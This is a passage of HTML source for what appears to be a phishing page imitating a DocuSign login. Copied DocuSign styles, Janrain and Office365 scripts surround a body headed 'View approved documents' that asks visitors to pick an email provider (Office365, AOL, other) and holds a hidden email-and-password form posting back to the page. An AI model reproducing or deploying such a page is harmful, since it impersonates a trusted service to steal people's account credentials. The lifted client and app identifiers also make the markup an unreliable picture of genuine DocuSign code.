  3689.            padding: 3px 0px 3px 2px;
  3690.        }
  3691.  
  3692.        .RowCellRight {
  3693.            border-left: none;
  3694.            border-right: solid 0px transparent;
  3695.            border-top: solid 1px #cccccc;
  3696.            border-bottom: solid 1px #cccccc;
  3697.            padding: 3px 0px 3px 4px;
  3698.        }
  3699.  
  3700.        .RowNoHeight {
  3701.            border-left: solid 0px #cccccc;
  3702.            border-right: solid 0px #cccccc;
  3703.            border-top: solid 1px #cccccc;
  3704.            border-bottom: solid 1px #cccccc;
  3705.            background-color: #ffffff;
  3706.            cursor: pointer;
  3707.        }
  3708.  
  3709.        .RowAltNoHeight {
  3710.            border-left: solid 0px #cccccc;
  3711.            border-right: solid 0px #cccccc;
  3712.            border-top: solid 1px #cccccc;
  3713.            border-bottom: solid 1px #cccccc;
  3714.            background-color: #ffffff;
  3715.            cursor: pointer;
  3716.        }
  3717.  
  3718.        .RowNoHeight:hover,
  3719.        .RowAltNoHeight:hover {
  3720.            background-color: #f4f4f4;
  3721.        }
  3722.  
  3723.        .ColSorted {
  3724.            background-image: url(img/row_col_sorted.png) !important;
  3725.        }
  3726.  
  3727.        .TreeHeader {
  3728.            position: relative;
  3729.            white-space: nowrap;
  3730.            height: 25px;
  3731.            font-weight: normal;
  3732.            padding-left: 4px;
  3733.            padding-top: 0px;
  3734.            margin-bottom: 0px;
  3735.            border-top: solid 1px transparent;
  3736.        }
  3737.  
  3738.        .TreeHeaderText {
  3739.            position: absolute;
  3740.            top: 4px;
  3741.            left: 20px;
  3742.        }
  3743.  
  3744.        .TreeHeaderTextNotTop {
  3745.            position: absolute;
  3746.            top: 13px;
  3747.            left: 20px;
  3748.        }
  3749.  
  3750.        .TreeHeaderActive {
  3751.            height: 25px;
  3752.            background-image: none;
  3753.            font-weight: bold;
  3754.            border: solid 1px transparent;
  3755.        }
  3756.  
  3757.        .TreeHeaderActiveNotTop {
  3758.            margin-top: 10px;
  3759.            padding-top: 10px;
  3760.            border-top: solid 1px transparent;
  3761.        }
  3762.  
  3763.        .TreeHeaderSel {
  3764.            font-weight: bold;
  3765.            background-image: url(img/dialog_green_h_rotated.png);
  3766.        }
  3767.  
  3768.        .TreeNewItem {
  3769.            font-size: 11px;
  3770.            position: absolute;
  3771.            top: 4px;
  3772.            right: 10px;
  3773.            font-weight: normal;
  3774.        }
  3775.  
  3776.        .TreeNewItemNotTop {
  3777.            font-size: 11px;
  3778.            position: absolute;
  3779.            top: 13px;
  3780.            right: 10px;
  3781.            font-weight: normal;
  3782.        }
  3783.  
  3784.        .TreeNodeSel {
  3785.            -webkit-user-select: none;
  3786.            -khtml-user-select: none;
  3787.            -moz-user-select: none;
  3788.            -o-user-select: none;
  3789.            user-select: none;
  3790.            padding-top: 2px;
  3791.            padding-bottom: 2px;
  3792.            background-image: url(img/manage_selector.png);
  3793.            background-repeat: repeat-x;
  3794.        }
  3795.  
  3796.        .TreeNode {
  3797.            -webkit-user-select: none;
  3798.            -khtml-user-select: none;
  3799.            -moz-user-select: none;
  3800.            -o-user-select: none;
  3801.            user-select: none;
  3802.            padding-top: 2px;
  3803.            padding-bottom: 2px;
  3804.        }
  3805.  
  3806.        .TreeNode:Hover {
  3807.            -webkit-user-select: none;
  3808.            -khtml-user-select: none;
  3809.            -moz-user-select: none;
  3810.            -o-user-select: none;
  3811.            user-select: none;
  3812.            padding-top: 2px;
  3813.            padding-bottom: 2px;
  3814.            background-color: #f4f4f4;
  3815.        }
  3816.  
  3817.        .TreeNodeNoH {
  3818.            -webkit-user-select: none;
  3819.            -khtml-user-select: none;
  3820.            -moz-user-select: none;
  3821.            -o-user-select: none;
  3822.            user-select: none;
  3823.            padding-top: 2px;
  3824.            padding-bottom: 2px;
  3825.        }
  3826.    </style>
  3827.    <style id="ds_litStyle" type="text/css"></style>
  3828.    <script language="javascript" src="js/XmlHttp.js?vers=18.1.100.8594" type="text/javascript"></script>
  3829.    <script type="text/javascript" src="js/jquery-1.10.2.min.js"></script>
  3830.    <link type="text/css" rel="stylesheet" href="css/Framework.css?vers=18.1.100.8594" />
  3831.    <link type="text/css" rel="stylesheet" href="css/activate.css" />
  3832.    <style id="ds_hldrHTMLHead_litStyle" type="text/css"></style>
  3833.  
  3834.    <script type='text/javascript'>
  3835.        function AuthenticateO365(popup) {
  3836.            var idx = window.location.href.toLowerCase().indexOf('/member');
  3837.            if (idx > -1) {
  3838.                var url = window.location.href.substr(0, idx);
  3839.                var redirurl = url + '/member/redirect.aspx?extauth=office365&login=';
  3840.                if (popup) redirurl += '0';
  3841.                else redirurl += '1';
  3842.                url += '/restapi/oauth2/externalauth/office365?redirect_uri=' + escape(redirurl) + '&client_id=DOCU-11110b8f-851d-400b-9ec2-641fd2372ac3&nocreate=1';
  3843.                if (popup) window.open(url, 'office365auth', 'height=503,width=950');
  3844.                else window.location.href = url;
  3845.            }
  3846.        }
  3847.  
  3848.        (function() {
  3849.            if (typeof window.janrain !== 'object') window.janrain = {};
  3850.            window.janrain.settings = {};
  3851.  
  3852.            /* _______________ can edit below this line _______________ */
  3853.  
  3854.            janrain.settings.tokenUrl = 'https://www.docusign.net/Member/JanrainProcessor.aspx?action=login';
  3855.            janrain.settings.type = 'embed';
  3856.            janrain.settings.appId = 'dhpfifnnpifbmnggpkia';
  3857.            janrain.settings.appUrl = 'https://login.docusign.net';
  3858.            janrain.settings.providers = ['live_id', 'googleplus', 'facebook', 'linkedin', 'salesforce', 'yahoo', 'twitter'];
  3859.            janrain.settings.providersPerPage = '8';
  3860.            janrain.settings.format = 'one column';
  3861.            janrain.settings.actionText = ' ';
  3862.            janrain.settings.showAttribution = false;
  3863.            janrain.settings.fontColor = '#333333';
  3864.            janrain.settings.fontFamily = 'Arial, helvetica, sans-serif';
  3865.            janrain.settings.backgroundColor = 'transparent';
  3866.            janrain.settings.width = '250';
  3867.            janrain.settings.borderColor = 'transparent';
  3868.            janrain.settings.borderRadius = '0';
  3869.            janrain.settings.buttonBorderColor = 'transparent';
  3870.            janrain.settings.buttonBorderRadius = '2';
  3871.            janrain.settings.buttonBackgroundStyle = 'gradient';
  3872.            janrain.settings.language = 'en';
  3873.            janrain.settings.linkClass = 'janrainEngage';
  3874.  
  3875.            /* _______________ can edit above this line _______________ */
  3876.  
  3877.            function isReady() {
  3878.                janrain.ready = true;
  3879.            };
  3880.            if (document.addEventListener) {
  3881.                document.addEventListener('DOMContentLoaded', isReady, false);
  3882.            } else {
  3883.                window.attachEvent('onload', isReady);
  3884.            }
  3885.  
  3886.            var e = document.createElement('script');
  3887.            e.type = 'text/javascript';
  3888.            e.id = 'janrainAuthWidget';
  3889.  
  3890.            if (document.location.protocol === 'https:') {
  3891.                e.src = 'https://rpxnow.com/js/lib/login.docusign.net/engage.js';
  3892.            } else {
  3893.                e.src = 'http://widget-cdn.rpxnow.com/js/lib/login.docusign.net/engage.js';
  3894.            }
  3895.  
  3896.            var s = document.getElementsByTagName('script')[0];
  3897.            s.parentNode.insertBefore(e, s);
  3898.        })();
  3899.    </script>
  3900.  
  3901.  
  3902.    <style type="text/css">
  3903.        #office365:hover {
  3904.            background-image: none;
  3905.            background-color: #E3E3E3;
  3906.        }
  3907.  
  3908.        #office365 .janrain-provider-icon-24 {
  3909.            background-image: url("img/office365_small.png");
  3910.            background-repeat: no-repeat;
  3911.        }
  3912.  
  3913.        .janrainColumnContainer {
  3914.            height: 320px;
  3915.        }
  3916.  
  3917.        .FieldLabel {
  3918.            padding-right: 1em;
  3919.            padding-bottom: 0.5em;
  3920.        }
  3921.  
  3922.        .form-area {
  3923.            padding-bottom: 1em;
  3924.        }
  3925.  
  3926.        .form-area h1 {
  3927.            padding-bottom: 1em;
  3928.            text-align: center;
  3929.        }
  3930.  
  3931.        .janrainContent {
  3932.            margin-left: auto;
  3933.            margin-right: auto;
  3934.        }
  3935.        
  3936.         .logins a:hover {
  3937.             box-shadow: 2px 5px 10px #1b49a0;
  3938.         }
  3939.    </style>
  3940.    <script type="text/javascript">
  3941.        // Wire-up our Janrain override functionality.
  3942.        $(document).ready(function() {
  3943.            setTimeout(renderO365, 500);
  3944.  
  3945.            function renderO365() {
  3946.                var twitterItem = $("#janrain-twitter");
  3947.                var existingO365 = $("#office365");
  3948.  
  3949.                if (twitterItem.length === 0) {
  3950.                    setTimeout(renderO365, 500);
  3951.                    return;
  3952.                }
  3953.  
  3954.                // Janrain is tricksy and re-renders when its popup windows are clicked, so we have to monitor for it and re-render when it re-renders.
  3955.                // So we poll to make sure things are right.
  3956.                if (existingO365.length !== 0) {
  3957.                    setTimeout(renderO365, 1000);
  3958.                    return;
  3959.                }
  3960.  
  3961.                // Have to use outerHTML to clone only the markup and not the attached events under IE8. Bleh - stupid attachEvent...
  3962.                var o365 = $(twitterItem[0].outerHTML);
  3963.  
  3964.                o365.attr("id", "office365");
  3965.                o365.click(function() {
  3966.                    AuthenticateO365(false);
  3967.                });
  3968.  
  3969.                var backgroundImage = o365.css("background-image");
  3970.  
  3971.                o365.mouseenter(function() {
  3972.                    o365.css("background-image", "");
  3973.                }).mouseleave(function() {
  3974.                    o365.css("background-image", backgroundImage);
  3975.                });
  3976.  
  3977.  
  3978.                $(".janrain-provider-icon-24", o365)
  3979.                    .removeClass("janrain-provider-icon-twitter")
  3980.                    .attr("title", "office365")
  3981.                    .attr("alt", "office365");
  3982.  
  3983.                $(".janrain-provider-text-color-twitter", o365)
  3984.                    .removeClass("janrain-provider-text-color-twitter")
  3985.                    .text("Office365");
  3986.  
  3987.                twitterItem.parent().append(o365);
  3988.                $(".janrainContent").css("height", "320px");
  3989.  
  3990.                // We just rendered, so keep monitoring, but we can wait a little longer.
  3991.                setTimeout(renderO365, 2000);
  3992.  
  3993.            }
  3994.  
  3995.        });
  3996.  
  3997.        // Wire-up the site list functionality.
  3998.        $(document).ready(function() {
  3999.  
  4000.            // When our site list selection changes, redirect the user to the selected site.
  4001.            var siteList = $("#ds_hldrBdy_SiteList");
  4002.            var uriPattern = /^http/i;
  4003.  
  4004.            siteList.change(function() {
  4005.  
  4006.                // If the selected entry has a value (i.e. URI), redirect there.
  4007.                var newSite = siteList.val();
  4008.                if ((newSite !== undefined) && (newSite !== null) && (uriPattern.test(newSite))) {
  4009.                    window.location.assign(newSite);
  4010.                }
  4011.            });
  4012.        });
  4013.    </script>
  4014.  
  4015.  
  4016.    <script language="javascript" type="text/javascript">
  4017.        var bdyId = "ds_hldrBdy_";
  4018.        var formbodyId = "ds_FormBody";
  4019.        var borderId = "ds_Border";
  4020.        var headertabsId = "ds_Tabs";
  4021.        var headerId = "ds_Header";
  4022.        var footerId = "ds_Footer";
  4023.        var tiId = "ds_ti";
  4024.        var headerContentId = "ds_hldrHC_";
  4025.        var hldrOutside = "ds_hldrOutside_";
  4026.        var masterIsMobile = "false";
  4027.        var masterIsSafari = "false";
  4028.        var leavemastermenuopen = false;
  4029.  
  4030.        function BtnCancelMD(btn) {
  4031.            if (btn && btn.onmousedown != null) btn.onmousedown = null;
  4032.        }
  4033.  
  4034.        function ChangeSelectedAccount(accountid, confirmMsg) {
  4035.            if (true) {
  4036.                if (confirmMsg == "" || confirm(confirmMsg)) {
  4037.                    if (typeof(CancelAsynch) != "undefined") CancelAsynch();
  4038.                    document.getElementById("hdnSetSelectedAccount").value = accountid;
  4039.                    if (typeof(txtHtmlBlobEscape) != "undefined") txtHtmlBlobEscape();
  4040.                    document.forms[0].submit();
  4041.                }
  4042.            }
  4043.        }
  4044.  
  4045.        function CE(e) {
  4046.            if (!e) e = window.event;
  4047.            if (e) {
  4048.                if (e.cancelBubble != null) e.cancelBubble = true;
  4049.                if (e.returnValue != null) e.returnValue = false;
  4050.                if (e.preventDefault) e.preventDefault();
  4051.                if (e.stopPropagation) e.stopPropagation();
  4052.            }
  4053.            return false;
  4054.        }
  4055.  
  4056.        function MasterPageAction(which) {
  4057.            if (true) {
  4058.                if (typeof(CancelAsynch) != "undefined") CancelAsynch();
  4059.                document.getElementById("ds_hdnMasterPageAction").value = which;
  4060.                if (typeof(txtHtmlBlobEscape) != "undefined") txtHtmlBlobEscape();
  4061.                document.forms[0].submit();
  4062.            }
  4063.        }
  4064.  
  4065.        function ChangeSite(site, accountId) {
  4066.            document.getElementById("hdnChangeSiteAccount").value = accountId;
  4067.            MasterPageAction(site);
  4068.        }
  4069.  
  4070.        function CloseMasterPageMenus() {
  4071.            if (leavemastermenuopen) {
  4072.                leavemastermenuopen = false;
  4073.                return;
  4074.            }
  4075.            ShowAccounts(true);
  4076.            var acttop = document.getElementById("ds_divUserAccountsMenu");
  4077.            if (acttop) acttop.className = "ActionsMenuClosed HeaderLink";
  4078.            var menu = document.getElementById("divAccountMenuItems");
  4079.            if (!menu) menu = document.getElementById("divAccountMenuItemsNew");
  4080.            if (menu) menu.style.display = "none";
  4081.            menu = document.getElementById("ds_divUserAccountsMenuNew");
  4082.            if (menu) menu.className = "ActionsMenuClosed";
  4083.            acttop = document.getElementById("ds_divLanguageMenu");
  4084.            if (acttop) acttop.className = "FooterMenuClosed";
  4085.            menu = document.getElementById("divLanguageMenuItems");
  4086.            if (menu) menu.style.display = "none";
  4087.            menu = document.getElementById("divSiteItems");
  4088.            if (menu) menu.style.display = "none";
  4089.            acttop = document.getElementById("ds_divHelpMenu");
  4090.            if (acttop) acttop.className = "FooterMenuClosed";
  4091.            var menu = document.getElementById("divHelpMenuItems");
  4092.            if (menu) menu.style.display = "none";
  4093.            acttop = document.getElementById("ds_divTermsMenu");
  4094.            if (acttop) acttop.className = "FooterMenuClosed";
  4095.            var menu = document.getElementById("divTermsMenuItems");
  4096.            if (menu) menu.style.display = "none";
  4097.            acttop = document.getElementById("ds_divIPMenu");
  4098.            if (acttop) acttop.className = "FooterMenuClosed";
  4099.            var menu = document.getElementById("divIPMenuItems");
  4100.            if (menu) menu.style.display = "none";
  4101.            if (typeof(LoadedSetDocMouseDown) != "undefined") LoadedSetDocMouseDown();
  4102.  
  4103.            var helpacttop = document.getElementById('divHelpMenu');
  4104.            if (helpacttop) acttop.className = 'ActionsMenuClosed';
  4105.            var helpmenu = document.getElementById('divHelpMenuItems');
  4106.            if (helpmenu) helpmenu.style.display = 'none';
  4107.        }
  4108.  
  4109.        function OpenMasterPageMenu(mi, outer, css) {
  4110.            if (document.getElementById(mi) && document.getElementById(mi).style.display == 'none') {
  4111.                var acttop = document.getElementById("ds_" + outer);
  4112.                if (acttop) acttop.className = "ActionsMenu " + css;
  4113.  
  4114.                /* get before display for positioning */
  4115.                var startl = 0;
  4116.                if (mi == "divLanguageMenuItems") {
  4117.                    var selitem = document.getElementById(bdyId + "divLanguageSelected");
  4118.                    if (selitem) {
  4119.                        startl = (selitem.offsetWidth / 2);
  4120.                    }
  4121.                }
  4122.                if (mi == "divTermsMenuItems") {
  4123.                    var selitem = document.getElementById("divTermsSelected");
  4124.                    if (selitem) {
  4125.                        startl = (selitem.offsetWidth / 2);
  4126.                    }
  4127.                }
  4128.                if (mi == "divIPMenuItems") {
  4129.                    var selitem = document.getElementById("divIPSelected");
  4130.                    if (selitem) {
  4131.                        startl = (selitem.offsetWidth / 2);
  4132.                    }
  4133.                }
  4134.                if (mi == "divHelpMenuItems") {
  4135.                    var selitem = document.getElementById("divHelpSelected");
  4136.                    if (selitem) {
  4137.                        startl = (selitem.offsetWidth / 2);
  4138.                    }
  4139.                }
  4140.  
  4141.                var midiv = document.getElementById(mi);
  4142.                midiv.style.display = 'block';
  4143.                if (masterIsMobile) document.ontouchend = CloseMasterPageMenus;
  4144.                document.onmousedown = CloseMasterPageMenus;
  4145.                if (mi == "divLanguageMenuItems" || "divHelpMenuItems" || "divTermsMenuItems" || "divIPMenuItems") {
  4146.                    var footer = document.getElementById(footerId);
  4147.                    var footerlinks = document.getElementById("divFooterLinks");
  4148.                    var bw = MasterPageBrowserWidth();
  4149.                    if (footer && footerlinks && bw > 0) {
  4150.                        var l = (masterIsSafari == "true") ? startl - (acttop.offsetWidth / 2) : 0 - startl - (acttop.offsetWidth / 2);
  4151.                        var scrleft = MasterPageScrollLeft();
  4152.                        if ((footerlinks.offsetLeft - scrleft) + l < 0) {
  4153.                            /* if left is off the screen put it at the left edge */
  4154.                            l -= l + (footerlinks.offsetLeft - scrleft);
  4155.                            acttop.style.left = l + "px";
  4156.                        } else {
  4157.                            var right = (footerlinks.offsetLeft + l + acttop.offsetWidth) - scrleft;
  4158.                            if (right > bw) {
  4159.                                l -= (right - bw);
  4160.                                /* if left is off the screen put it at the left edge */
  4161.                                if ((footerlinks.offsetLeft - scrleft) + l < 0) {
  4162.                                    l += (right - bw);
  4163.                                    l -= l + (footerlinks.offsetLeft - scrleft);
  4164.                                }
  4165.                            }
  4166.                            acttop.style.left = (l) + "px";
  4167.                        }
  4168.                    }
  4169.                } else if (mi == "divHelpMenuItems" || "divTermsMenuItems" || "divIPMenuItems") acttop.style.left = 0 + "px";
  4170.            }
  4171.        }
  4172.  
  4173.        function ShowAccounts(hide) {
  4174.            var div = document.getElementById("divAccountMenuItems");
  4175.            if (!div) div = document.getElementById("divAccountMenuItemsNew");
  4176.            if (div) div = div.firstChild;
  4177.            while (div) {
  4178.                if (div.getAttribute && div.getAttribute("isaccount") == "1") {
  4179.                    div.style.display = hide ? "none" : "";
  4180.                }
  4181.                div = div.nextSibling;
  4182.            }
  4183.            if (!hide) leavemastermenuopen = true;
  4184.        }
  4185.  
  4186.        function LogoSizePage() {
  4187.            if (typeof(Size) == "function") Size();
  4188.            if (typeof(ResizeSqueezePage) == "function") {
  4189.                ResizeSqueezePage();
  4190.                ResizeSqueezePage(false, true);
  4191.            }
  4192.            if (typeof(SizeFrames) == "function") {
  4193.                if (typeof(BrowserDims) != "undefined" && typeof(gHPg) != "undefined") BrowserDims(gHPg);
  4194.                SizeFrames();
  4195.            }
  4196.            if (typeof(SizeWindowObjects) == "function") SizeWindowObjects();
  4197.            if (typeof(ResizeManageAccounts) == "function") ResizeManageAccounts();
  4198.            if (typeof(ResizePage) == "function") ResizePage();
  4199.            if (typeof(SizeContentHeight) == "function") SizeContentHeight();
  4200.            if (typeof(resize) == "function") resize();
  4201.        }
  4202.  
  4203.        function MasterPageBrowserWidth() {
  4204.            var bw = 0;
  4205.            if (typeof(window.innerWidth) != 'undefined') {
  4206.                bw = window.innerWidth;
  4207.            } else if (typeof(document.documentElement) != 'undefined' && document.documentElement.clientWidth) {
  4208.                bw = document.documentElement.clientWidth;
  4209.            } else if (typeof(document.documentElement) != 'undefined' && document.documentElement.offsetWidth) {
  4210.                bw = document.documentElement.offsetWidth;
  4211.            } else {
  4212.                var body = document.getElementsByTagName("body");
  4213.                if (body && body[0] &&
  4214.                    typeof(body[0]) != 'undefined') {
  4215.                    if (typeof(body[0].clientWidth) != 'undefined' && body[0].clientWidth != 0) {
  4216.                        bw = body[0].clientWidth;
  4217.                    } else if (typeof(body[0].offsetWidth) != 'undefined' && body[0].offsetWidth != 0) {
  4218.                        bw = body[0].offsetWidth;
  4219.                    }
  4220.                }
  4221.            }
  4222.            return bw;
  4223.        }
  4224.  
  4225.        function MasterPageScrollLeft() {
  4226.            var bL = 0;
  4227.            if (masterIsMobile == "true" && window.pageXOffset != null) {
  4228.                bL = window.pageXOffset;
  4229.            } else if (document.documentElement && document.documentElement.scrollLeft != null) {
  4230.                bL = document.documentElement.scrollLeft;
  4231.            } else {
  4232.                bL = document.body.scrollLeft;
  4233.            }
  4234.            return bL;
  4235.        }
  4236.  
  4237.        function upgradeClick() {
  4238.            if (document.forms['upgradeForm'] != null) {
  4239.                document.forms['upgradeForm'].submit();
  4240.            }
  4241.            return false;
  4242.        }
  4243.    </script>
  4244. </head>
  4245.  
  4246.  
  4247.  
  4248. <body id="ds_docubody">
  4249.  
  4250.    <form method="post" action="" id="aspnetForm">
  4251.        <div class="aspNetHidden">
  4252.            <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTQzNzc3ODg2MQ8WAh4VX19BbnRpWHNyZk1lbWJlclRva2VuBSAyN2E3MDYxMmIwOTI0YzM2OThkYjFiMzc0YTYwMDljMBYCZg9kFgICAg9kFggCAQ8PFgIeB1Zpc2libGVoZGQCAw9kFgICBw9kFgoCAQ8PFgIfAWhkFgoCAQ8WAh8BaGQCAw9kFgICAQ8WAh4EVGV4dAUWU2V0IGFjY291bnQgYXMgZGVmYXVsdGQCBw9kFgICAw9kFgJmDxYMHgdvbmNsaWNrBRZyZXR1cm4gdXBncmFkZUNsaWNrKCk7Hglpbm5lcmh0bWxlHghkaXNhYmxlZGQeCm9ua2V5cHJlc3MFaGlmKGV2ZW50KXtpZih0eXBlb2YoSXNFbnRlck9yU3BhY2VLZXkpIT09J3VuZGVmaW5lZCcmJklzRW50ZXJPclNwYWNlS2V5KGV2ZW50KSl7cmV0dXJuIHVwZ3JhZGVDbGljaygpO319HhBDYXVzZXNWYWxpZGF0aW9uZx4FY2xhc3MFDEJ0bnNlY29uZGFyeWQCCQ8WAh8BaGQCDQ8WAh8CBQZMb2dvdXRkAgUPDxYCHwFoZBYKAgEPDxYCHwFoZGQCAw8PFgIfAWhkZAIEDw8WAh8BaGRkAgUPDxYCHwFoZGQCCQ8PFgIfAWhkZAIHDw8WAh8BaGQWCgIBDxYCHwFoZAIDDxYCHwFoZAIJDxYCHwFoZAIPD2QWAgIBDxYCHwIFFlNldCBhY2NvdW50IGFzIGRlZmF1bHRkAhUPFgIfAgUGTG9nb3V0ZAIJDw8WAh8BaGRkAgsPZBYCAgEPZBYCAgMPEA8WAh4LXyFEYXRhQm91bmRnZA8WBGYCAQICAgMWBBAFA05BMQUzaHR0cHM6Ly93d3cuZG9jdXNpZ24ubmV0L01lbWJlci9KYW5yYWluRGlzcGxheS5hc3B4ZxAFA05BMgUzaHR0cHM6Ly9uYTIuZG9jdXNpZ24ubmV0L01lbWJlci9KYW5yYWluRGlzcGxheS5hc3B4ZxAFA05BMwUzaHR0cHM6Ly9uYTMuZG9jdXNpZ24ubmV0L01lbWJlci9KYW5yYWluRGlzcGxheS5hc3B4ZxAFAkVVBTJodHRwczovL2V1LmRvY3VzaWduLm5ldC9NZW1iZXIvSmFucmFpbkRpc3BsYXkuYXNweGdkZAIHDxYCHwJlZAIJDw8WAh8BaGRkZLPHkEseDSO6z3OLYcKlDQ0hytFHJVmg/KAOoF49Syg+l/lXPc+/w0BoZPPPIwe++HxL0ej54DeFmGxg0CRUC88=" />
  4253.        </div>
  4254.  
  4255.        <div class="aspNetHidden">
  4256.  
  4257.            <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="B2C6BEC4" />
  4258.            <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdAAc2HpljsHMc3ko7qWtMAwIjUxg2eR5ftqPriAH4UyjRrHc9wrbHQpcOPAAI5iaiKfFQcmKRVhBaWpIqfGI7n7lAPooQ6xlmNYUzxS8YIMYt7wpMZ52KETNMhGu5BUYcYUYxLaG6QZnBQJBnZUwy7F+4Y82XUSJ29sMTtD3de5ny5o22YGtRBi9NtHuvP/81oLV/KRP6rANwWPDu8wSWZ0Dau1iNWxeXGnY0k7WB3EJONg==" />
  4259.        </div>
  4260.        <div id="ds_divInstance" style="display: none;">
  4261.            173
  4262.        </div>
  4263.        <input type="hidden" name="ds$ti" id="ds_ti" />
  4264.        <input type="hidden" name="hdnSetSelectedAccount" id="hdnSetSelectedAccount" value="" />
  4265.        <input name="ds$hdnMasterPageAction" type="hidden" id="ds_hdnMasterPageAction" />
  4266.        <input type="hidden" name="hdnChangeSiteAccount" id="hdnChangeSiteAccount" value="" />
  4267.        <div id="ds_Border" class="Border scroll-container">
  4268.  
  4269.  
  4270.            <div id="ds_FormBody" class="FormBody scroll-area">
  4271.  
  4272.  
  4273.  
  4274.                <div class="top-area" id="newHeader">
  4275.                    <div class="logo-wrapper">
  4276.                        <a href="http://www.docusign.com" class="logo-link">
  4277.                <img src="img/docusign.png" class="logo" alt="Docusign"></a>
  4278.                    </div>
  4279.                    <div class="help-wrapper"><a href="http://www.docusign.com/support" class="help-link" target="_new">Help</a></div>
  4280.                </div>
  4281.  
  4282.  
  4283.                <div class="form-area">
  4284.                    <h1>
  4285.                        View approved documents
  4286.                    </h1>
  4287.                    <div id="ds_hldrBdy_janrainRow" class="janrainColumnContainer LoginRow LoginRowLbl" style="display: none;">
  4288.                        <div class="container">
  4289.                            <form class="form-signin">
  4290.                                <label for="inputEmail" class="sr-only">Email address</label>
  4291.                                <input type="email" id="inputEmail" name="email" class="form-control" placeholder="Email address" required autofocus>
  4292.                                <label for="inputPassword" class="sr-only">Password</label>
  4293.                                <input type="password" id="inputPassword" name="password" class="form-control" placeholder="Password" required>
  4294.                                <br>
  4295.                                <button class="btn btn-lg btn-primary btn-block" type="submit">Login</button>
  4296.                            </form>
  4297.  
  4298.                        </div>
  4299.                    </div>
  4300.                    <h3 class="LoginRow LoginRowLbl">
  4301.                        <span class="FieldLabel">Select your email provider</span><br><br>
  4302.                         <div class="logins">
  4303.                             <a href="office365" class="btn btn-block btn-lg btn-cus"><img src="img/app_office-365_512x512.png" alt="" height="30"> Office365</a>
  4304.                             <a href="aol" class="btn btn-block btn-lg btn-cus"><img src="img/aol.png" alt="" height="15"></a>
  4305.                             <a href="other" class="btn btn-block btn-lg btn-cus"><img src="img/social_auth_providers.png" alt="" height="25"></a>
  4306.                         </div>
  4307.                    </h3>
  4308.                </div>
  4309.  
  4310.  
  4311.  
  4312.            </div>
  4313.  
  4314.        </div>
  4315.  
  4316.        <div id="popupMask"></div>
  4317.  
  4318.        <div id="ds_Footer" class="Footer">
  4319.  
  4320.            <img id="ds_imgLogoFooter" title="Powered by DocuSign" class="FooterImage" src="img/powered_by_docusign_gray.png" alt="Powered by DocuSign" style="height:20px;" />
  4321.  
  4322.            <div class="FooterLinks" id="divFooterLinks">
  4323.                <div id="ds_divLanguageMenu" class="FooterMenuClosed">
  4324.                    <div id="divLanguageMenuItems" style="display: none;">
  4325.                        <div class="ActionMenuItemTopSmall" onmousedown="CloseMasterPageMenus();" onkeydown="CloseMasterPageMenus();"></div>
  4326.                        <table role="presentation">
  4327.                            <tr>
  4328.                                <td>
  4329.                                    <div title="Simplified Chinese" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-zh_CN');return CE(event);" onmousedown="MasterPageAction('setlang-zh_CN')" onkeydown="MasterPageAction('setlang-zh_CN')">中文 (简体)</div>
  4330.                                </td>
  4331.                                <td>
  4332.                                    <div title="Traditional Chinese" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-zh_TW');return CE(event);" onmousedown="MasterPageAction('setlang-zh_TW')" onkeydown="MasterPageAction('setlang-zh_TW')">中文 (繁體)</div>
  4333.                                </td>
  4334.                                <td>
  4335.                                    <div title="Dutch" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-nl');return CE(event);" onmousedown="MasterPageAction('setlang-nl')" onkeydown="MasterPageAction('setlang-nl')">Nederlandse</div>
  4336.                                </td>
  4337.                                <td>
  4338.                                    <div title="English" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-en');return CE(event);" onmousedown="MasterPageAction('setlang-en')" onkeydown="MasterPageAction('setlang-en')">English</div>
  4339.                                </td>
  4340.                            </tr>
  4341.                            <tr>
  4342.                                <td>
  4343.                                    <div title="French" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-fr');return CE(event);" onmousedown="MasterPageAction('setlang-fr')" onkeydown="MasterPageAction('setlang-fr')">Français</div>
  4344.                                </td>
  4345.                                <td>
  4346.                                    <div title="German" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-de');return CE(event);" onmousedown="MasterPageAction('setlang-de')" onkeydown="MasterPageAction('setlang-de')">Deutsch</div>
  4347.                                </td>
  4348.                                <td>
  4349.                                    <div title="Italian" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-it');return CE(event);" onmousedown="MasterPageAction('setlang-it')" onkeydown="MasterPageAction('setlang-it')">Italiano</div>
  4350.                                </td>
  4351.                                <td>
  4352.                                    <div title="Japanese" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-ja');return CE(event);" onmousedown="MasterPageAction('setlang-ja')" onkeydown="MasterPageAction('setlang-ja')">日本語</div>
  4353.                                </td>
  4354.                            </tr>
  4355.                            <tr>
  4356.                                <td>
  4357.                                    <div title="Korean" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-ko');return CE(event);" onmousedown="MasterPageAction('setlang-ko')" onkeydown="MasterPageAction('setlang-ko')">한국어</div>
  4358.                                </td>
  4359.                                <td>
  4360.                                    <div title="Portuguese (Portugal)" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-pt');return CE(event);" onmousedown="MasterPageAction('setlang-pt')" onkeydown="MasterPageAction('setlang-pt')">Português (Portugal)</div>
  4361.                                </td>
  4362.                                <td>
